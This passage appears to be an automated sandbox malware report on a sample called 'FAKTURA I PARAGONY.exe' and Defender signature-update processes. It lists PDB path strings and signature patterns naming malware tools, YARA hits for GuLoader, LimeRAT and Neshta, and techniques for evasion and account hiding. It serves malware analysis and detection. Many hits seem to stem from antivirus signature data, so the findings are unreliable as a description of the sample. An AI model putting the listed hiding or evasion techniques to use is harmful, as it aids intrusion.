    Source: Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
    Source: Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
    Source: Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
    Source: Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
    Source: Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
    Source: Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
    Source: Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
    Source: Binary string: S*\\server\\V.*\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp
    Source: Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
    Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
    Source: Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp
    Source: Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
    Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
    Source: Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
    Source: Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
    Source: Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
    Source: Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
    Source: Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
    Source: Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp
    Source: Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp
    Source: Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
    Source: Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
    Source: Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
    Source: Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
    Source: Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp
    Source: Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
    Source: Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
    Source: Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
    Source: Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
    Source: Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
    Source: Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
    Source: Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
    Source: Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
    Source: Binary string: 7laIR+|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
    Source: Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
    Source: Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
    Source: Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
    Source: Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
    Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp
    Source: Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.*\\.*\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp
    Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
    Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
    Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp
    Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
    Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
    Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6274258225.0000028BD7599000.00000004.00000001.sdmp
    Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
    Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
    Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp
    Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
    Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
    Source: Binary string: acpi.pdbN source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: Fwizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\FancHuible.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
    Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
    Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
    Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
    Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
    Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
    Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
    Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
    Source: Binary string: \ProcExpDriver.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
    Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp
    Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
    Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
    Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
    Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
    Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
    Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
    Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp
    Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp
    Source: Binary string: security.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
    Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
    Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
    Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
    Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
    Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp
    Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
    Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
    Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
    Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
    Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp
    Source: Binary string: dsget.pdb source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp
    Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
    Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
    Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
    Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
    Source: Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
    Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp

    Data Obfuscation:

    Yara detected GuLoader
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: Yara match File source: 00000000.00000002.2628573263.0000000002270000.00000040.00000001.sdmp, type: MEMORY
    Yara detected MaliciousMacro
    Source: Yara match File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Costura Assembly Loader
    Yara detected AllatoriJARObfuscator
    Yara detected MSILLoadEncryptedAssembly
    Source: Yara match File source: 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Binary or sample is protected by dotNetProtector
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
    Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
    Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
    Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
    Source: MpSigStub.exe, 00000023.00000003.6300288491.0000028BD79FB000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6
    Yara detected VB6 Downloader Generic
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected BatToExe compiled binary
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: mpavbase.vdm.35.dr Static PE information: real checksum: 0x354a210 should be:
    Source: mpasbase.vdm.35.dr Static PE information: real checksum: 0x329e303 should be:
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_0040545F push eax; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_00405426 push eax; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_00402F51 push 758B20A2h; ret
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_00406154 push eax; ret
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_00403B21 push ds; ret
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_004049E5 push eax; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_004043FF push eax; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_00403585 push eax; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_0227425F push edi; ret
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_022748B2 push ss; retf
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_0227393F pushad ; ret
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_02272170 push esp; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_02272B9C push ebx; iretd
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Code function: 0_2_02271BF1 push eax; ret
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1E00C623 push eax; iretd
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1E00C663 push eax; iretd
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1E00C673 push eax; iretd
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_1E00C683 push eax; iretd

    Persistence and Installation Behavior:

    Yara detected Neshta
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe

    Boot Survival:

    Yara detected LimeRAT
    Source: Yara match File source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match File source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected Neshta
    Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

    Hooking and other Techniques for Hiding and Protection:

    May modify the system service descriptor table (often done to hook functions)
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
    Contains functionality to hide user accounts
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Yara detected LimeRAT
    Source: Yara matchFile source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected generic Shellcode Injector
    Source: Yara matchFile source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR
    Yara detected AntiVM3
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
